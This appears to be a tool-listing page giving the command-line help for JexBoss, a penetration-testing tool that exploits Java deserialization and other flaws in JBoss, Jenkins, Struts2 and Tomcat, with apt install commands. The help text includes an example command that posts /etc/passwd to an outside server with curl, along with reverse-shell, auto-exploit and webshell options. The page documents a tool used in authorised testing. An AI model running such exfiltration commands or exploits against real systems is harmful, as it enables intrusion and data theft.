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  • jexboss - JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms


usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] [-mode {standalone,auto-scan,file-scan}] [--app-unserialize] [--servlet-unserialize] [--jboss] [--jenkins] [--struts2] [--jmxtomcat] [--proxy PROXY]
[--proxy-cred LOGIN:PASS] [--jboss-login LOGIN:PASS] [--timeout TIMEOUT] [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD] [--dns URL] [--windows] [--post-parameter PARAMETER] [--show-payload]
[--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}] [--load-gadget FILENAME] [--force] [-host HOST] [-network NETWORK] [-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS]
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector (CVE-2015-5317).
--struts2 Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-3427). OBS: Will not be checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
--cookies NAME=VALUE Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. Format: "NAME1=VALUE1; NAME2=VALUE2" (eg. --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg.
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)
--dns URL Specifies the dns query for use with "dns" Gadget
--windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}
Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg.
-ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per line)
File name to store the file scan results

Install jexboss
sudo apt install jexboss
Remove jexboss
sudo apt remove jexboss

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